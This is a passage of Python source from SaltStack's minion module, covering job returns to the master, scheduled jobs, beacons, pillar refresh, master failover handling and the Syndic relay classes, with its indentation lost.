if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
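# Illustrative minion config snippets (the SLS and top file names are
# assumptions) covering the three branches below:
#
#     startup_states: highstate        # run state.highstate on start
#
#     startup_states: sls              # or run a specific list of SLS files
#     sls_list:
#       - edit.vim
#       - motd
#
#     startup_states: top              # or use an alternate top file
#     top_file: salt.top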
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a scheduled job that periodically fires a grains_refresh event to inform the master about changes in this minion's grains
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the beacons.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Manage the minion's scheduled jobs: add, modify, delete, enable, disable or run them based on the event data.
'''
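# The event data is a dict; a sketch (values assumed) of what the 'add'
# branch below expects:
#
#     {'func': 'add',
#      'name': 'job1',
#      'schedule': {'job1': {'function': 'test.ping', 'seconds': 3600}},
#      'persist': True}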
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
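# The event data is a dict; a rough sketch (the beacon name and its
# configuration are assumptions) of what the 'add' branch below expects:
#
#     {'func': 'add',
#      'name': 'diskusage',
#      'beacon_data': [{'/': '63%'}]}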
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
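# A sketch of the expected event data (values assumed):
#
#     {'environ': {'FOO': 'bar'},
#      'false_unsets': False,
#      'clear_all': False}
#
# Keys other than 'environ' are optional and default to False below.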
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('matchers_refresh'):
self.matchers_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not my master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master']:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default value '0' is
# overloaded to mean 'disable the job', yet when salt detects a timeout
# it still needs to set up these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job so it doesn't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# Handle this event only once, otherwise it will pollute the log.
# Also, if the master type is failover, all the reconnection work is done
# by the `disconnected` event handler and this event should never happen;
# check it anyway to be sure.
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
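# the scheduler itself is polled once per second; loop_interval is only passed through to process_schedule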
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
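# ping_interval is configured in minutes; convert it to seconds for the timer below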
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
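# the mismatched defaults (0 vs 1) ensure that a load without a master_id is always forwarded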
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local client's poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well:
it will (under most circumstances) stall for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which we were unable to send for some reason and which will be
# resent to any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
